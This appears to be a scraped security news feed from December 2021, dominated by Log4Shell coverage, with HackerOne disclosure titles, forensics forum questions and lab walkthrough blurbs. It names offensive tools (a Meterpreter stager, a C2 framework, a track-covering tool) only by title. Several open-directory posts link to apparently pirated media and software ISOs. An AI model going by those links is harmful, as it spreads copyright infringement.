    Article URL: https://github.com/log4js-node/log4js-node/issues/1105 Comments URL: https://news.ycombinator.com/item?id=29632280 Points: 1 # Comments: 1
    SecWiki News 2021-12-21 Review
    Reflections on foreign cyber exercises by ourren; CaptfEncoder: a cross-platform cybersecurity tool suite by guyoung. For more recent articles, visit SecWiki.
    Log4j: A forcing function to adopt long-overdue continuous security
    Are you prepared for the next big zero day exploit? Read what we learned from the Log4j crisis and what you can do to secure your assets with continuous AppSec.
    Trends that underscore the seriousness of the cybersecurity skills gap
    It is no secret that there's a glaring skills gap in cybersecurity. Learn more about the trends impacting AppSec success and the steps that can help bridge gaps in DevSecOps workflows.
    MCFE certification
    So I took the MCFE about 4 days ago, passed, and I haven't heard back from Magnet about my certification. Should I contact someone or just wait a while longer? submitted by /u/bath_and_toaster
    Need help on the state of and keywords for mobile device tracking in 1999
    Everybody look at your shelves and find books/software from 1999. Thank you for any pointers to books or sources. Not an attorney, just helping a friend doing life. Working up an appeal and several FOIA requests and searching for exact phrasing to use. What software/hardware/process existed in 1999 for any level of law enforcement to trace cell tower movements? Feds to state levels. Suspecting it was all tower techs as time permitted. Was any GPS data on a 2G flip phone worth looking at back in 1999? Looking for more than cell tower data in there maybe? Any specific references to law enforcement access to request tower pings, especially near Kentucky, 1999. (1999) My friend asked his attorneys to get the cell tower data and the lawyer contacted a tech who gave them a highly technical handwritten reply. This note was lost. Police did not produce cell data to place him at the scene in a nearby state, KY. Suspect it was suppressed and it needs to be found as a purchase for software/training or Federal cooperation of some department that I am guessing at, like the FCC, FBI or the actual phone company. Thanks again! I am old school, OpenVMS VAX/Alphas ~Peace submitted by /u/OK_AquaFarmer
    CVE-2021-42287/CVE-2021-42278 Scanner & Exploiter Fork with some improvements
    submitted by /u/v1brio
    Powershell .Net Assembly loader for the [CVE-2021-42287 - CVE-2021-42278] Scanner & Exploiter
    submitted by /u/v1brio
    Logistics giant data breach, phishing attack impersonates Pfizer | Global cybersecurity highlights for December 21
    The city government of Tulsa, USA, spent $2 million and 8 months recovering from a ransomware attack.
    PyMICROPSIA: the Two-tailed Scorpion group's new information-stealing trojan strikes again
    Recently, the RedDrip team of the QiAnXin Threat Intelligence Center captured, during routine threat hunting, attack samples this group built in Python; such samples were first discovered by a foreign vendor and named PyMICROPSIA.
    Cloud native: Kubernetes security
    As more and more enterprises move to the cloud, cloud-related scenarios are frequently encountered in offensive and defensive exercises, for example public cloud, private cloud, hybrid cloud, and virtualized clusters.
    Principles of DDoS and CC attacks (part 2)
    This article describes defense mechanisms against DDoS and CC attacks.
    T-Mobile has blocked 21 billion scam calls this year, more than half related to vehicle warranty scams
    On average it identified and blocked 1.8 billion attempted scam calls per month, that is, 700 attempted scam calls per second!
    Commands can be executed like this? A study of command execution bypasses and protection rules
    A study of command execution bypasses and protection rules
    Hackers exploit the Log4Shell vulnerability to attack the Belgian Ministry of Defence
    The Belgian Ministry of Defence suffered a cyberattack.
    The Clop ransomware gang is leaking confidential UK police data
    The Clop ransomware gang successfully stole confidential data from UK police and leaked it on the dark web.
    Research on detection and protection strategies for the Log4j2 remote code execution vulnerability
    The Log4j2 vulnerability has been public for some time, and the major security vendors have provided their own solutions for fixing it.
    零时科技 | Analysis of the attack on the DeFi platform Grim Finance
    On December 19, 2021 (Beijing time), Grim Finance tweeted that the platform had been exploited by an external attacker, who stole tokens worth more than $30 million.
    Exploring emerging forces in China's cybersecurity industry | Preparations begin for the first "Cybersecurity New Forces" conference
    With the convening of the "CIS 2021 Cybersecurity Innovation Conference Spring Edition", preparations for the first "Cybersecurity New Forces" event have officially begun.
    Meta files lawsuits over phishing attacks
    Meta is bringing a series of lawsuits against phishing attackers and people who abuse the platform for malicious purposes.
    admin password disclosure via log file
    Acronis disclosed a bug submitted by darkdream: https://hackerone.com/reports/1121972 - Bounty: $100
    Log4j RCE on https://judge.me/reviews
    Judge.me disclosed a bug submitted by bhishma14: https://hackerone.com/reports/1427589 - Bounty: $50
    USA Movies
    submitted by /u/Yankeeslv
    Custom Metasploit Module for Log4Shell Scanner
    In this article, we will discuss a customized Metasploit module I wrote for scanning applications vulnerable to Log4Shell as well as how…

    Is it possible to encrypt my browsing data on a public wi-fi without using a VPN?
    I've been thinking a lot about this since recently a coffee shop near me opened, and it had open wifi. I do not want to pay for a VPN since I do not trust them for my data to show up as encrypted into the network. I found this on GitHub, but I have not tested it enough to see if it works. So can someone give any help with that? submitted by /u/ArturEPinheiro777
    Best Practices with Email DLP Exceptions
    Hey guys, so we have our entire org covered with email DLP from O365. One of our vendors generally deals with sensitive data (social security numbers) and thus has requested an exception for them; what should be the best way to deal with it? Bypassing the entire DLP policy for an email ID, although it sounds easy, I wanted to hear back some feedback on the best practices. submitted by /u/w33ha_AD
    I've read about multiple data breaches at US cell phone carriers (ex: AT&T, T-Mobile). Where is this data going? Is there a way I can see if my information is floating around and how widely it is distributed?
    Basically, these hacks are pretty significant and I'd like to know both the depth and breadth of what people know about my personal information. Inb4: It's all out there. I suppose it is, but I want to know the specifics, if only out of curiosity. Like, if one alpha hacker knows and doesn't share it with anybody, I'm probably good because I'm neither rich nor famous enough to really draw his or her attention. If it's out in the open for all to see, on the other hand, somebody might harass me. I use a Yubikey so I'm good there. Thank you! submitted by /u/iExtrapolate314
    Owning internal networks is way too easy, what could Microsoft do to improve the situation?
    It's more surprising when you don't get domain admin. So many things are broken: the terrible implementation of name resolution, machines caching login credentials, passing the hash, golden tickets, NTLM relay, IPv6, WPAD, the list goes on. Surely there must be a better way. What are some improvements you would like to see from Microsoft? submitted by /u/ImTheMaddest
    Intruding 5G SA core networks from outside and inside
    submitted by /u/sebazzen
    OSS Getting Hammered for BigCorp Failures
    submitted by /u/GelosSnake
    Inside a PBX - Discovering a Firmware Backdoor
    submitted by /u/RedTeamPentesting
    letme.go - A minimalistic Meterpreter stager written in Go
    submitted by /u/0xdea
    Log4j Vulnerability CVE-2021-45105: What You Need to Know (and how it differs from CVE-2021-45046)
    submitted by /u/ScottContini
    A Simple Geolocation Exercise
    In September 2020, British army paratroopers performed a joint training exercise with Ukrainian armed forces as part of Exercise Joint…
    How Not to Get “Caught” — An OPSEC (Operational Security) Advice Aware Analysis of a Modern…
    Have you ever dreamed of getting “caught” and actually making the headlines with your latest research that also includes the digitally…
    Setting them Straight — 10 Years Back in the Future — A Brief Overview of the Hacker Scene Circa…
    Do you remember the hacker scene circa the 90s? Check out this brief analysis of the Scene up to present day back then. Keep reading.
    An adorable twenty-seven second stop-motion video titled, "themonster.mov"
    submitted by /u/HGMIV926
    pictures of britain
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Betty's recipes.
    submitted by /u/PM_ME_TO_PLAY_A_GAME
    Sharing my movie theme music collection
    submitted by /u/ercohn
    X Files complete series 1080p (English and Spanish subs)
    submitted by /u/Skajuan
    Inverting PhotoDNA with Machine Learning
    submitted by /u/anishathalye
    X-Ways handling of ad1 images
    Does X-Ways have an issue with ad1 images? I currently have at least 200 ad1 images from a 750gb disk's unallocated space. I need to do data carving on the totality of the images. When doing “refine volume snapshot” one image at a time, I sometimes have files that do not really represent what I am searching for. For example, on one image I could carve 18 files, all mp3 files. These are not the files I am looking for. I am searching for doc/docx files that I know are there (we did live forensics before acquiring the hdd). What are your thoughts on this? submitted by /u/MisterTroubadour
    SecWiki News 2021-12-20 Review
    SecWiki Weekly (Issue 407) by ourren; Introduction to CIS (part 2): CIS Benchmark & CIS Community Defense Model 2.0 by ourren. For more recent articles, visit SecWiki.
    Shellcode Generation with The Radare2 Framework
    submitted by /u/DLLCoolJ
    Log4j Vulnerability – What You Need to Know and How to Address Immediately
    Article URL: https://www.crestdatasys.com/blogs/log4j-vulnerability-what-you-need-to-know-and-how-to-address-immediately/ Comments URL: https://news.ycombinator.com/item?id=29622121 Points: 3 # Comments: 0
    Apache Log4j 2 vulnerability – Detection and fix simplified in your Java code
    Article URL: https://medium.com/@amitsoni4774/apache-log4j-2-vulnerability-detection-and-fix-simplified-in-your-java-code-9a6dd1d06796 Comments URL: https://news.ycombinator.com/item?id=29620987 Points: 2 # Comments: 0
    Fuzzing
    Article URL: https://owasp.org/www-community/Fuzzing Comments URL: https://news.ycombinator.com/item?id=29620816 Points: 2 # Comments: 0

    Moving my server sooo grab what you want. Super fast speeds TV/Music/Movies
    submitted by /u/Bryan2pointOh
    What's your F***ing problem ?
    Hi everyone. I would like to talk about a subject that I consider abnormal. First of all I would like to clarify that:
    - I would like to apologize for this off-topic post.
    - This post does not concern 99% of OpenDirectories users, whom I also thank for keeping this subreddit alive and for their work.
    - I would like to thank the moderation team, who do an excellent job.
    - I don't give a damn about karma points; my account can drop to -10,000, I don't care, it's just an "aesthetic feature".
    There are times when some users post sites that they haven't thoroughly reviewed, and that's okay. In these publications, it happens that some content is illegal, immoral or whatever ... It is not the fault of the users who provided the link; it is something that happens. But why, for cryi…
    log4j — Getting to 2.16 and 2.17 is Only Critical If You Have Non-Default Logging Enabled
    submitted by /u/danielrm26
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan
    All in One SEO Plugin Vulnerability Affects 3M Sites
    Article URL: https://www.searchenginejournal.com/all-in-one-seo-vulnerability-2021/430230/ Comments URL: https://news.ycombinator.com/item?id=29615935 Points: 1 # Comments: 0
    Understanding the Impact of Apache Log4j Vulnerability
    Article URL: https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html Comments URL: https://news.ycombinator.com/item?id=29611871 Points: 2 # Comments: 0
    Deep Understanding of Commits for Automated Vulnerability Identification
    Article URL: https://sites.google.com/view/du-commits/ Comments URL: https://news.ycombinator.com/item?id=29611738 Points: 1 # Comments: 0
    Xcode 13.2 contains Log4j vulnerability
    Article URL: https://developer.apple.com/forums/thread/696785 Comments URL: https://news.ycombinator.com/item?id=29610913 Points: 181 # Comments: 41
    GDB/Peda Help
    I've set up GDB and Peda, and Peda works fine except that some commands require sudo. However, whenever I run GDB with sudo, it loads plain GDB without Peda. I've edited the .gdbinit file as the instructions say. Any help would be appreciated. submitted by /u/Radiant-Midnight-278
    I made a tool to cover your tracks post-exploitation on Linux machines for Red Teamers
    submitted by /u/mufeedvh
    Alan c2 post-exploitation framework v5.0 - All you can in-memory edition
    submitted by /u/aparata_s4tan
    The Insidious Need for Speed
    “We need it yesterday. Speed kills. Coffee is for closers. First to market. If you're in control, you're not going fast enough.”
    OSINT CASE STUDY 1
    disclaimer: education purpose only
    Uncovering the hackers, who stole your Facebook account
    About 6 months ago I was sitting at my desk, working on my CS145 homework, when I heard a familiar ding, a new message on Facebook…
    SecWiki News 2021-12-19 Review
    In-depth analysis of SPEL expression injection vulnerabilities by ourren; Detecting CobaltStrike based on anomalous behavior by ourren; Exploring rule-vectorization-based HTTP asset identification methods by ourren; A brief discussion of passive IAST products and their technical implementation: code implementation demo by ourren; A brief discussion of passive IAST products and their technical implementation: fundamentals by ourren; Finding vulnerabilities with CodeQL? by ourren; Incident response: how to trace an attack when there are no traces by ourren; Several niche but practical remote control tools by ourren; Details of the iMessage zero-click exploit made public by ourren; ACSAC 2021 accepted papers list by ourren. For more recent articles, visit SecWiki.
    digitalworld.local: Vengeance Vulnhub Walkthrough
    Donavan's VENGEANCE (digitalworld.local: VENGEANCE) is a medium-level machine designed for Vulnhub. This lab includes a difficult exploitation procedure that is suitable for those experienced… The post digitalworld.local: Vengeance Vulnhub Walkthrough appeared first on Hacking Articles.
    Unauthorized access to choice.av.ru control panel
    Azbuka Vkusa disclosed a bug submitted by wocat: https://hackerone.com/reports/963161 - Bounty: $100
    Open redirect (DOM-based) on av.ru via "return_url" parameter (Login form)
    Azbuka Vkusa disclosed a bug submitted by zophi: https://hackerone.com/reports/958864 - Bounty: $100
    Dependency repository hijacking aka Repo Jacking from GitHub repo rubygems/bundler-site & rubygems/bundler.github.io + bundler.io docs
    RubyGems disclosed a bug submitted by akincibor: https://hackerone.com/reports/1430405

    [Cullinan #24] Add ESI Injection and Update Others
    This is Cullinan update log #24. ESI Injection was added, RCE-related content was added to SSTI, and the tools were updated. Finally, part of the Cullinan main page design was changed (max-width removed). Add ESI Injection Update SSTI (Add RCE, Update Tools) Update Cullinan Design ESI Injection is an item I shared as a blog post more than three years ago; it is not a case that shows up often in practice, so I had forgotten about it and only recently added it to Cullinan. It is still an interesting vulnerability, so I recommend reading it at least once :D

    Trip.com: First Step towards Cloud Native Security
    TL; DR This post shares our explorations on cloud native securities for Kubernetes as well as legacy workloads, with CiliumNetworkPolicy for L3/L4 access control as the first step. TL; DR 1 Introduction 1.1 Access control in Kubernetes 1.2 Implementation and extension in Cilium 1.3 Challenges in large deployments 1.4 Organization of this post 2 Access control: from requirements to a solution 2.1 Policy enforcement in a single cluster 2.2 Policy enforcement over multiple clusters 2.2.1 ClusterMesh 2.2.2 KVStoreMesh 2.3 Policy enforcement over legacy clients 2.3.1 CiliumExternalResource (CER) 2.3.2 cer-apiserver 2.3.3 Sum up: a hybrid data plane 2.4 Control plane 2.4.1 Access control policy (ACP) modeling 2.4.2 Enforcer-specific adapters 2.4.3 Push (and reconc…


    Log4j 2.17.0 released, for third CVE (CVE-2021-45105)
    Article URL: https://logging.apache.org/log4j/2.x/index.html Comments URL: https://news.ycombinator.com/item?id=29609578 Points: 3 # Comments: 2  ( 5 min )
    Third High Severity CVE in Log4j Is Published
    Article URL: https://logging.apache.org/log4j/2.x/security.html Comments URL: https://news.ycombinator.com/item?id=29604097 Points: 430 # Comments: 306  ( 11 min )

    Patch fixing critical Log4j 0-day has its own vulnerability that’s under exploit
    Article URL: https://arstechnica.com/information-technology/2021/12/patch-fixing-critical-log4j-0-day-has-its-own-vulnerability-thats-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=29609295 Points: 2 # Comments: 0  ( 3 min )
    Apache Log4j Vulnerability Webinar – What You Need to Know
    Article URL: https://www.criticalinsight.com/resources/news/article/apache-log4j-vulnerability-webinar-what-you-need-to-know/ Comments URL: https://news.ycombinator.com/item?id=29608959 Points: 1 # Comments: 0  ( 2 min )

    How.It.Made
    submitted by /u/ohimjustakid [link] [comments]  ( 1 min )
    A few directories with small amount of music
    Index of /stuff/mp3/amd (audio.msk.ru) Index of /music/funk (czyborra.com) Index of /files (rarekindrecords.co.uk) Index of /audio/ (martindoyleflutes.com) (music from an irish flute player) Index of /files/mp3 (saparov.ru) Index of /albums/4151 (soton.ac.uk) submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )
    Want to know some line-dancing moves? Here's some PDFs that show you some dance steps.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )

    Reasons to go looking in the Registry
    Chris Sanders tweeted out an interesting pair of questions recently, and the simple fact is that for me to fully answer the question, the tweet thread would be just too extensive. The questions were: What are the most common reasons you go looking in the Windows registry? What do you use it to prove most? Like almost everything else in DFIR, my response to both questions is, it depends. Why? Well, it depends upon the goals of your investigation. What I use the Registry to prove depends heavily on what I'm trying to prove, or to disprove. This may sound pretty obvious, and even intuitive, but far too often in DFIR, we can find ourselves far too easily chasing down rabbit holes that have little, if anything, to do with our investigative goals. Configuration The Windows Registry holds a g…  ( 7 min )

    Preferred method of collecting folders or loose documents on Macs ?
    I'm using Sumuri Recon and looking through the features, but it seems to be an all or nothing product (imaging the entire disk/volume). This is not confirmed by any means. I haven't spent enough time with Sumuri, but it doesn't appear to allow for collection of specific folders. Anyone here have experience with small, targeted, forensically sound collections on Macs? The hardware dongle makes this a small pain point, as it would be nice to remotely preserve a few documents in a defensible manner. This is very simple when dealing with Windows devices, where FTK Imager can be installed and executed within seconds. Anyone aware of a Mac APFS equivalent? This particular remote MacBook Pro is on Catalina (APFS) and I have all the keys to the castle. I'm not as interested in preserving extended metadata as I am in the plain created and modified dates. Perhaps a zipping solution that preserves these two dates? submitted by /u/zero-skill-samus [link] [comments]  ( 1 min )
    How does forensic imaging of locked cellular devices work?
    I've been looking into mobile forensics and I've realized that everything I come across pertaining to imaging a filesystem starts with "Unlock the device". This doesn't quite make sense to me, because if an LEO gets a warrant to search a phone, the owner obviously doesn't have to tell them/enter the password. And from what I can tell, the only way to really "get" the password starts off with imaging the filesystem/creating a backup. Am I missing something? submitted by /u/Fusiondew [link] [comments]  ( 4 min )
    CCTV went down
    Hello to all forensicators. We have a weird situation where about 20 of our CCTVs just stopped recording. One of our external vendors was running a VAPT test on the VLAN containing the cameras at the same time they went down. The CCTV logs show us that XSS and SQL injection attacks were being run on the cameras. Checking the application log tells us the time when the cameras stopped recording and the time they got back online. However, I am unable to figure out what the exact attack was that brought down the cameras. What logs should I be looking at to figure this out? submitted by /u/indianadmin [link] [comments]  ( 1 min )
    VPN data exfiltration
    A colleague of mine was referencing someone using a Kali Linux USB drive on a Windows 10 machine and connecting to a VPN. They believe the individual was pushing business-related data through the VPN that was unauthorized. Is there anything forensically that one could look for on the E01 to see what might have gone outbound? submitted by /u/WhoAteTheLastCookie [link] [comments]  ( 2 min )

    A Detailed Guide on Log4J Penetration Testing
    In this article, we are going to discuss and demonstrate in our lab setup, the exploitation of the new vulnerability identified as CVE-2021-44228 affecting the The post A Detailed Guide on Log4J Penetration Testing appeared first on Hacking Articles.  ( 8 min )

    SecWiki News 2021-12-18 Review
    Reproducing the CVE-2016-7124 deserialization vulnerability by SecIN社区. For more of the latest articles, visit SecWiki  ( 2 min )

    ESI(Edge Side Include) Injection
    🔍 Introduction ESIi stands for ESI (Edge Side Include) Injection and refers to an injection attack against that markup in environments that use ESI. ESI, short for Edge Side Include, is a simple markup language used to define web page components for the dynamic assembly and delivery of web applications at the edge of the Internet. It is a standard tag set for page assembly, used in architectures such as web caches and load balancers. Inside HTML code, ESI appears as tags like the one below; before the response body reaches the web browser, the tags are processed in advance by a cache server or similar component that can handle ESI, and the resulting data is returned.

    HackMyVM — Forbidden
    Writeup (Spanish) Continue reading on Medium »  ( 3 min )
    Should You Trust Your Admin Tools?
    No, not really Continue reading on Medium »  ( 4 min )

    Stored XSS on 1.4.0
    ImpressCMS disclosed a bug submitted by tehwinsam: https://hackerone.com/reports/1331281
    HTML injection in email content during registration via FirstName/LastName parameter
    MTN Group disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1256496
    Flickr Account Takeover using AWS Cognito API
    Flickr disclosed a bug submitted by lauritz: https://hackerone.com/reports/1342088 - Bounty: $7550

    Alternative Process Injection
    submitted by /u/dmchell [link] [comments]

    lurch1317: A new Pidgin plugin with strong crypto for deniability (WIP)
    submitted by /u/hardenedvault [link] [comments]  ( 1 min )
    Log4j version 2.17.0 fixes a new problem CVE-2021-45105 DoS vuln (CVSS score of 7.5)
    submitted by /u/ScottContini [link] [comments]  ( 2 min )

    [Day 16] OSINT Ransomware Madness | Advent of Cyber 3 (2021)
    OSINT stands for Open Source Intelligence, information that can be obtained from free and public sources. Offensive teams commonly use… Continue reading on Medium »  ( 3 min )


    Threat Intelligence on Log4j CVE: Key Findings and Their Implications
    Article URL: https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications Comments URL: https://news.ycombinator.com/item?id=29599546 Points: 1 # Comments: 0  ( 6 min )
    Security in context: When is a CVE not a CVE?
    Article URL: https://snyk.io/blog/when-is-a-cve-not-a-cve/ Comments URL: https://news.ycombinator.com/item?id=29589692 Points: 2 # Comments: 0  ( 5 min )
    Bypass of allowedLdapHost check in Log4j 2.15.0 – Log4Shell (CVE-2021-44228)
    Article URL: https://twitter.com/marcioalm/status/1471740771581652995 Comments URL: https://news.ycombinator.com/item?id=29588947 Points: 3 # Comments: 1  ( 1 min )
    Risk analysis of Log4Shell (CVE-2021-44228) and mitigation
    Article URL: https://hardenedvault.net/2021/12/17/analysis-CVE-2021-44228.html Comments URL: https://news.ycombinator.com/item?id=29587870 Points: 1 # Comments: 0  ( 4 min )

    If You're Not Doing Continuous Asset Management You're Not Doing Security
    submitted by /u/danielrm26 [link] [comments]  ( 3 min )
    Fail2ban / Regexp rule against LOG4J vuln
    submitted by /u/AGS42 [link] [comments]
    Log4Shell Update: Full bypass found in log4j 2.15.0, enabling RCE again (with payload)
    submitted by /u/freeqaz [link] [comments]  ( 2 min )

    A website's gone
    What happened to the.eye? Is it dead, dead or is there a second website? Also, the link to the discord that the automod gave me was invalid. submitted by /u/Sleepingpiranha [link] [comments]  ( 2 min )
    A large collection of indiscriminately-named mp3 music.
    submitted by /u/HGMIV926 [link] [comments]  ( 1 min )
    Sparks albums
    submitted by /u/International_Milk_1 [link] [comments]  ( 1 min )

    html injection at judge.me
    Judge.me disclosed a bug submitted by 0xteles: https://hackerone.com/reports/1036995
    Reflected Cross-Site Scripting/HTML Injection
    Informatica disclosed a bug submitted by jak0_: https://hackerone.com/reports/1379158

    SecWiki News 2021-12-17 Review
    No news has been posted today yet~ For more of the latest articles, visit SecWiki  ( 2 min )

    CALDERA
    Hey everyone, does anyone here use or have used CALDERA? A small question regarding initial access: are we meant to deploy an agent locally and then do lateral movement within the network to reach other target machines? Thank you! submitted by /u/lifeislemon_not_cake [link] [comments]  ( 1 min )

    Apache Log4j 2, Flexera and you
    By now, you’ve probably learned of Apache Log4j 2. As reported across the web, there is the recently disclosed CVE-2021-44228 vulnerability in Apache Log4j 2 (widely referred to as Log4Shell) affecting organizations far and wide. This is a critical vulnerability in Apache Log4j 2, impacting versions from 2.0-beta9 to 2.14.1. And now you’ve likely been asking, “Where is this vulnerability within my own IT ecosystem, and how do I mitigate it if necessary?” Flexera is helping work through the issue with our customers by ensuring immediate visibility of the impact of this and other vulnerabilities within their IT estate. Flexera…

    In-depth analysis of SpEL expression injection vulnerabilities
    1. Introduction to SpEL. SpEL (Spring Expression Language) is an expression language more powerful than JSP's EL. It was introduced in Spring 3 and can wire values into bean properties and constructor arguments in a powerful yet concise way; the expressions used in this process are evaluated at runtime. With SpEL you can achieve wiring effects that other wiring techniques can hardly match. 2. Using SpEL. SpEL can be used in two ways: in annotations, or by parsing expressions through the interfaces provided by the SpEL component. Use in annotations: (code samples not captured). Use through the interface: (code sample not captured). This code evaluates a simple SpEL expression, "3*3", and the final result is shown below. SpEL expressions can also execute more complex commands, such as operating on an object. The code is shown below: first a POJO class, then a SpEL expression that operates on the properties of the user object. Besides properties, SpEL can also operate on an object's methods; for example, our POJO class User has an instance method sayHi and a static method sayBye, and we use SpEL expressions to call each of them. First the instance method, i.e. the dynamic method; the result is shown below. Then the static method, with the code shown below…

    Extract sms messages from Google Backup? Cellebrite failed on Android/Samsung
    I've tried using Cellebrite Cloud to extract messages from a Google Drive Android backup (Android sends Google backups to Google Drive). It failed to parse after running several tests using my own device. I also tried to access my Samsung backup, which includes messages. Cellebrite Cloud failed to log in at all. Has anyone had any success accessing or extracting SMS from Android Google backups or Samsung backups? It's unfortunate when tools provide that service yet fail to perform. submitted by /u/zero-skill-samus [link] [comments]  ( 2 min )


    CHFI 2021 Exam Review
    As some of you may know, CHFI is considered to be the baseline of computer forensics certifications, which is why I thought that buying a test and course from EC-Council would be the place to start. I will lay out the topics that I was NOT expecting to get tested on. Let me preface by saying that there is NO one study guide out there that will prepare you for your test. You will hear people saying "I didn't study and still passed/I studied for two weeks and passed." Unless you've worked as a SOC Analyst or have 2 years of prior computer forensics, you will fail. I began studying in January of this year and took the test in October. I failed with a 57%. While you need a 75%~ to pass, there are things the EC-Council test prep package did NOT prepare me for and the only reason why I got…  ( 4 min )
    SUMURI RECON ITR now has the ability to physically image M1, M1 Max, and M1 Pro Mac computer
    submitted by /u/acw750 [link] [comments]  ( 1 min )
    Detecting RAID parameters for rebuild
    Hi all, I have 3 E01 RAID discs from a QNAP device, which I am trying to rebuild. X-Ways, OS Forensics and mdadm don't recognize the RAID parameters automatically. So the day has finally come to learn more about RAID... Is there somebody who can point me to some good reading on how to extract these parameters from the discs? Thanks in advance! submitted by /u/Lizzy4235 [link] [comments]  ( 1 min )

    Google storage bucket takeover which is used to load JS file in dashboard.html in "github.com/kubernetes/release" which can lead to XSS
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398706 - Bounty: $100
    Race Condition Vulnerability when creating profiles
    Showmax disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1428690
    Able to access private picture/video/writing when requesting for their JSON response
    FetLife disclosed a bug submitted by trieulieuf9: https://hackerone.com/reports/1424291 - Bounty: $250
    Broken Link Takeover from kubernetes.io docs
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398572 - Bounty: $100
    Broken Github Link Used in deployment docs of "github.com/kubernetes/kompose"
    Kubernetes disclosed a bug submitted by codermak: https://hackerone.com/reports/1398617 - Bounty: $100

    digital world.local: FALL Vulnhub Walkthrough
    FALL (digitalworld.local: FALL) is a medium level machine created by Donavan for Vulnhub. This lab is appropriate for some experienced CTF players who wish to The post digital world.local: FALL Vulnhub Walkthrough appeared first on Hacking Articles.  ( 5 min )
    Thales1 Vulnhub Walkthrough
    “Thales” is a Capture the Flag challenge available on Vulnhub. MachineBoy deserves credit for developing this box. In this box, we will learn how to The post Thales1 Vulnhub Walkthrough appeared first on Hacking Articles.  ( 6 min )

    Forgiveness
    I forgive you for your first lies. I forgive myself for believing into it. Continue reading on Medium »  ( 1 min )

    Mitigating the Log4Shell vulnerability (CVE-2021-44228) on DietPi
    Article URL: https://dietpi.com/blog/?p=1172 Comments URL: https://news.ycombinator.com/item?id=29581625 Points: 2 # Comments: 0  ( 5 min )
    Securing K8s clusters for Log4j CVE-2021-44228
    Article URL: https://github.com/kubearmor/log4j-CVE-2021-44228 Comments URL: https://news.ycombinator.com/item?id=29573520 Points: 1 # Comments: 0  ( 7 min )

    Old programs for WIN & MAC (Office 95, Encarta, iLife, etc) and ISOs
    Mostly in French http://145.239.62.120/download_center/repos/Applications/ http://145.239.62.120/download_center/repos/ISOs/ submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )

    SecWiki News 2021-12-16 Review
    Research on detection and protection strategies for the Log4j2 remote code execution vulnerability by ourren. For more of the latest articles, visit SecWiki  ( 2 min )

    Nighthawk 0.1 - New Beginnings - @MDSecLabs
    submitted by /u/dmchell [link] [comments]  ( 1 min )

    Detailed explanation of the principles behind the Apache Shiro deserialization vulnerability
    Introduction to Apache Shiro. Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, cryptography and session management. With Shiro's easy-to-understand API, you can quickly and easily secure any application, from the smallest mobile app to the largest web and enterprise applications. This article gives a principle-level explanation of Shiro, analysing the whole authentication and authorization flow at the source-code level, and along the way explains the role of rememberMe and why that field leads to a deserialization vulnerability. Apache Shiro authentication. In this section we explain in detail how Shiro authenticates a user as legitimate. The Shiro vulnerable test environment code is modified from CVE-2016-4437 in Vulhub. First is Shiro's configuration file (code sample not captured); then the Controller code (code sample not captured); finally the Realm (code sample not captured). Here is the class inheritance and implementation diagram of the custom MainRealm. The Realm's role is usually to fetch the back-end user's information, obtain the user information passed in from the front end, package both and hand them to Shiro for comparison to decide whether the user is legitimate, and then grant the user the specified permissions when accessing back-end resources. So how does authentication actually work? Below is a detailed analysis from the perspective of Shiro's source code. First is the login page and its code. When the Sign in button is clicked, the corresponding back-end Controller executes, but before reaching the Controller, Shiro performs an operation, as shown below. First is Shiro's Filter; in Shiro's configuration file, via @…
    From zero to one: a deep dive into the log4j2 JNDI RCE vulnerability CVE-2021-44228
    0x01 Preface. Recently the IT world has been in an uproar over the log4j2 vulnerability. As an excellent Java logging component, log4j2 is used in all kinds of derived frameworks and is one of the basic components of the current Java ecosystem; once such a component collapses, the impact is incalculable. According to the statistics from the Apache Log4j2 vulnerability impact query, it affects as many as 60,644 open-source projects and 321,094 related package versions. The vulnerability is trivial to trigger and extremely cheap to exploit; it can fairly be called a 'catastrophe' for the Java ecosystem. This article takes you from zero to one into the log4j2 vulnerability. Only by knowing why can you understand deeply and act with purpose. 0x02 The Java logging landscape. To understand log4j2, we have to talk about Java's logging ecosystem. Before 2001 Java had no logging library; logs were printed via System.out and System.err, with obvious drawbacks: large amounts of I/O; no reasonable control of output, and output could not be saved, so someone had to watch it; no way to customise the log format or display at fine granularity. In 2001 the developer Ceki Gulcu designed a logging library, log4j (note: no '2' here). Later log4j became an Apache project and its author joined Apache. A small aside: Apache suggested that Sun include log4j in the standard library, but Sun perhaps had its own ideas, rejected the suggestion and shipped its own imitation, JUL (Java Util Logging), in JDK 1.4. Its functionality was still not as strong as Log4j and its adoption was small. Since there were now two logging libraries, to make it easier for developers to choose, Apache released the logging facade JCL (Jakarta Commons Logging). It provides a logging abstraction layer and binds to a logging implementation dynamically at runtime (such as log4j or java.util.logging): whichever is imported gets bound, with no need to…


    Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
    submitted by /u/dmchell [link] [comments]  ( 1 min )
    My road map !! Need help
    This is my roadmap to be a red teamer. Does anything need to change?
    1- Learn programming
    ---Python
    ---C/C++
    2- Networking and OS
    ---Linux
    ---IT and networking basics
    ---THM Pre Security path
    3- Web security
    ---THM Web Fundamentals path
    ---OWASP Top 10 guide
    4- Hacking basics
    ---THM Complete Beginner path
    ---INE PTS course
    ---THM Jr Penetration Tester path
    5- Doing CTFs
    ---THM
    ---Hack The Box
    ---Vulnhub
    6- The OSCP
    7- Red team certs
    ---Pentester Academy CRTP
    ---Pentester Academy CRTE
    ---Offensive Security OSCE
    ---NOTES--- I am a computer science student. I have learned C++ and Python scripting and the Linux command line. submitted by /u/Ok_Attempt_3411 [link] [comments]  ( 2 min )
    Guys, does anyone know anything about 7asecurity.com course content?
    Guys, does anyone know anything about 7asecurity.com course content? submitted by /u/Select_Plane_1073 [link] [comments]  ( 1 min )

    Windows Credential Manager for hackers
    Windows can store credentials for easy reuse. There are several ways to access them. Continue reading on System Weakness »  ( 3 min )
    Runas for hackers
